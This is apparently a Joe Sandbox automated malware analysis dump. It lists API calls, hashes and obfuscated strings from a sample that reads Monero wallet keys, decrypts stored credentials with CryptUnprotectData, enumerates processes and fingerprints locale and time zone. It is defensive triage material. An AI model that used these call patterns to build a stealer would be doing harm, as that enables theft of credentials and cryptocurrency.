                          • Opcode Fuzzy Hash: 1a4bb9907c88632fadbbdf02320ec303d5fbbb48ac3146026bcedd408af7d2c7
                          • Instruction Fuzzy Hash: 8BB229F360C2049FE304AE2DEC8567ABBE9EF94720F1A493DE6C5C3744EA3558058697
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,00C105AF), ref: 00C07BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00C07BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00C07C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00C07C62
                          • LocalFree.KERNEL32(00000000), ref: 00C07D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 29346d8900b395220a1a50ae009148f41503cdfc03b4315d9c71d22b5be80e16
                          • Instruction ID: ea4c4967bd4bc55b50fdc491def6ad789c28401a4bcabe756fcec337488c50f8
                          • Opcode Fuzzy Hash: 29346d8900b395220a1a50ae009148f41503cdfc03b4315d9c71d22b5be80e16
                          • Instruction Fuzzy Hash: 71416C7191021CABDB24DB94DC89BEEB778FF44700F204299E109621C0DB342F89DFA1
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00C10D73), ref: 00BFE4A2
                          • StrCmpCA.SHLWAPI(?,00C114F8), ref: 00BFE4F2
                          • StrCmpCA.SHLWAPI(?,00C114FC), ref: 00BFE508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00BFEBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: e3e340e779b2337acf41c1327f59cd15ccabb23fe46e3b56191838bb801ae913
                          • Instruction ID: 5ec35304c6f4f1260f4fd2929f863bdc7836cc17942d5eeb7b414e2cd3f7e8bf
                          • Opcode Fuzzy Hash: e3e340e779b2337acf41c1327f59cd15ccabb23fe46e3b56191838bb801ae913
                          • Instruction Fuzzy Hash: 5C1244719102189ADB14FB60DD96EFE7379AF54300F4086A8B50AA60D1EF346F89DF92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 5~~$WGog$_uu^$q5?$r/$sn]
                          • API String ID: 0-2276904910
                          • Opcode ID: a3066d580eb59d001d2a6264519e4dbf57b8a3b756b9e1cdd63bff706b384bec
                          • Instruction ID: 7186f3d9e6c322a60defb2a8f91e15f0a43fd36f7c7796423f9ef52c0cb904a1
                          • Opcode Fuzzy Hash: a3066d580eb59d001d2a6264519e4dbf57b8a3b756b9e1cdd63bff706b384bec
                          • Instruction Fuzzy Hash: 45B2E6F360C204AFE7046E2DEC8577ABBE9EF94720F16493DE6C4C7744EA3558018696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: W$;O$Aju$F?}$Qmz}$n
                          • API String ID: 0-1244549565
                          • Opcode ID: 3952b63269ddc7c5bc0a60e6b6d43268ed7645365a6baa6f0f421657a9aca569
                          • Instruction ID: 8842ffe18eb448dcf5f403ed653748d102123ea2edb9cec6d2e183d177a3cc28
                          • Opcode Fuzzy Hash: 3952b63269ddc7c5bc0a60e6b6d43268ed7645365a6baa6f0f421657a9aca569
                          • Instruction Fuzzy Hash: 00B20AF3A0C2049FE3046E2DEC8567AFBE9EF94720F1A453DE6C5C3744EA3598058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 6$A_$RDO$RDO$]z?$Dr
                          • API String ID: 0-2234824041
                          • Opcode ID: 7d93f218f6ada6e7b01af00e2a3499f23e797247d23e8259b87807a1bf4c0642
                          • Instruction ID: 7140636c336b227dae35ada1f6a40be46f1706abc771ade8692cf14955df8a3a
                          • Opcode Fuzzy Hash: 7d93f218f6ada6e7b01af00e2a3499f23e797247d23e8259b87807a1bf4c0642
                          • Instruction Fuzzy Hash: 9582F6F3A0C2009FE3046E29EC8567AFBE5EF94720F16893DE6C487744EA3558458797
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: :Fy$a<}>$c4X$cc}$;Vl
                          • API String ID: 0-57280250
                          • Opcode ID: 81ea2cf99e3304e3a5f9f0dffca6844f18d6d9346c9abf1d30e0d88d2207e270
                          • Instruction ID: 03aa335405bf26646b303e31699be220fe5a3e238a6c2e4acfe68df105dec4df
                          • Opcode Fuzzy Hash: 81ea2cf99e3304e3a5f9f0dffca6844f18d6d9346c9abf1d30e0d88d2207e270
                          • Instruction Fuzzy Hash: 8DB2E5F3908210AFE3046E29EC8576AFBE5EF94760F1A493DEAC8D3744E63558018797
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BFC871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BFC87C
                          • lstrcat.KERNEL32(?,00C10B46), ref: 00BFC943
                          • lstrcat.KERNEL32(?,00C10B47), ref: 00BFC957
                          • lstrcat.KERNEL32(?,00C10B4E), ref: 00BFC978
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: 1893c2db83a14ac7cf01c7ea4de4ea9d19941bb204407e071f5f5342b59f4f39
                          • Instruction ID: 6f324b5c154fac7970030c795894381cdb3412f412e6f0049f299497ed9f2e5f
                          • Opcode Fuzzy Hash: 1893c2db83a14ac7cf01c7ea4de4ea9d19941bb204407e071f5f5342b59f4f39
                          • Instruction Fuzzy Hash: 6C413D7590421D9FCB10DFA4CD89BFEBBB8AB44304F1481B8E609A7280D7B55AC8CF91
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00BF724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00BF7254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00BF7281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00BF72A4
                          • LocalFree.KERNEL32(?), ref: 00BF72AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 22f056cc1f5c1fa9d42270333d7bffda07d6efd60d8372d2fe991bfd5832629d
                          • Instruction ID: 5ed819081fcfbb5e33c064b9c76fa6a925c39d2d00b2353c3a31b173a535d619
                          • Opcode Fuzzy Hash: 22f056cc1f5c1fa9d42270333d7bffda07d6efd60d8372d2fe991bfd5832629d
                          • Instruction Fuzzy Hash: E30100B5A40208BFDB14DBD4DD4DFAD7BB8EB44700F144199FB05BB2C0DAB0AA448B65
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C0961E
                          • Process32First.KERNEL32(00C10ACA,00000128), ref: 00C09632
                          • Process32Next.KERNEL32(00C10ACA,00000128), ref: 00C09647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 00C0965C
                          • CloseHandle.KERNEL32(00C10ACA), ref: 00C0967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: 1c36fcdcf98920a33efb0d0733eedecce2557b36e991d1375911649901a5a259
                          • Instruction ID: 9dc8087a60ae7e235553bd7ec50c58618db6a69d3ab1e1d0b9fcf74e03a06ccf
                          • Opcode Fuzzy Hash: 1c36fcdcf98920a33efb0d0733eedecce2557b36e991d1375911649901a5a259
                          • Instruction Fuzzy Hash: 46010C75A00208AFCB54DFA6CD8CBEDBBF8EB48700F144199B945A6290DB759B84CF51
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /*N3$DKf6$c|}=$eX9
                          • API String ID: 0-4089870414
                          • Opcode ID: a803307fd72b188cbc060a500fce4828f800dd97576b7273d5c6169b4b42f799
                          • Instruction ID: 2195bec1fc1f40f1885c7c3c024be4fa1b26f0f4b850f55aca85c731ebfed4d0
                          • Opcode Fuzzy Hash: a803307fd72b188cbc060a500fce4828f800dd97576b7273d5c6169b4b42f799
                          • Instruction Fuzzy Hash: 33B2F7F3A0C2049FE304AE2DEC8567AFBE9EF94720F16463DEAC4C7744E63558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 'y|$Al@$`L{$l~k
                          • API String ID: 0-3583029365
                          • Opcode ID: 7a76e09c098b3246b9af2d945a45c73514f5f5aaf1cfe4f784bd428e4512742b
                          • Instruction ID: 9c64ed7991aeeb2a278a1f308d27655ba576a6d69052d510f89c69d389942201
                          • Opcode Fuzzy Hash: 7a76e09c098b3246b9af2d945a45c73514f5f5aaf1cfe4f784bd428e4512742b
                          • Instruction Fuzzy Hash: 36B205F3A0C2049FE704AE2DEC8577ABBE9EF94320F16493DEAC5C7744E63558018696
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00C105B7), ref: 00C086CA
                          • Process32First.KERNEL32(?,00000128), ref: 00C086DE
                          • Process32Next.KERNEL32(?,00000128), ref: 00C086F3
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • CloseHandle.KERNEL32(?), ref: 00C08761
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: c985941b7e76e6770791d5c7cf00f50d03567d33a5b1372a1cde05eed73c8295
                          • Instruction ID: f1f0e01ba1b6226ba9bbedd6a28675ac31fcc4166baa463d2ad9f5be696124f4
                          • Opcode Fuzzy Hash: c985941b7e76e6770791d5c7cf00f50d03567d33a5b1372a1cde05eed73c8295
                          • Instruction Fuzzy Hash: 9D315C71911218ABCB24DF55CC45FEEB778EF45700F1082A9F10AA21E0DF706A89CFA1
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00BF5184,40000001,00000000,00000000,?,00BF5184), ref: 00C08EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: b0385c63ee470128d3d8d4130dae0bbd2f08da7aa0edec77278efb56c17b2f17
                          • Instruction ID: 281c2c3ed8f1f9cfce962c2476daf4ea457d4897eb3ce17f862881e525802a47
                          • Opcode Fuzzy Hash: b0385c63ee470128d3d8d4130dae0bbd2f08da7aa0edec77278efb56c17b2f17
                          • Instruction Fuzzy Hash: 7B112174200209FFDB04CFA5D889FAB37A9AF89300F14D458F9558B290DB35ED49DB60
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BF4EEE,00000000,00000000), ref: 00BF9AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00BF4EEE,00000000,?), ref: 00BF9B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BF4EEE,00000000,00000000), ref: 00BF9B2A
                          • LocalFree.KERNEL32(?,?,?,?,00BF4EEE,00000000,?), ref: 00BF9B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: 525a44cb9d9c670529c9539c19375abc6be611a5f275a35378e59de37d84cf8c
                          • Instruction ID: b12dfb2f3f7b3917a21fdbe489819a4333f1197e4eaeb7b2f9a1d306e935b0da
                          • Opcode Fuzzy Hash: 525a44cb9d9c670529c9539c19375abc6be611a5f275a35378e59de37d84cf8c
                          • Instruction Fuzzy Hash: 1F11A4B4240208AFEB14CF64DC99FAA77B5FB89700F208098FA159B3D0C775A945CB50
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C10E00,00000000,?), ref: 00C079B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C079B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00C10E00,00000000,?), ref: 00C079C4
                          • wsprintfA.USER32 ref: 00C079F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: fe892864cc32a84297435d3ae766b6895da2fcab8a7f0a1b3f41dc8e827713a7
                          • Instruction ID: 03b22927fc7e5d5bb48377ce7b4d855b17954a6a01bba3c460548d59286f1813
                          • Opcode Fuzzy Hash: fe892864cc32a84297435d3ae766b6895da2fcab8a7f0a1b3f41dc8e827713a7
                          • Instruction Fuzzy Hash: CA112AB2904118ABCB14DFCADD49BBEBBF8FB4CB11F14425AF645A2280D2395944C7B1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,006EDA90,00000000,?,00C10E10,00000000,?,00000000,00000000), ref: 00C07A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C07A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,006EDA90,00000000,?,00C10E10,00000000,?,00000000,00000000,?), ref: 00C07A7D
                          • wsprintfA.USER32 ref: 00C07AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
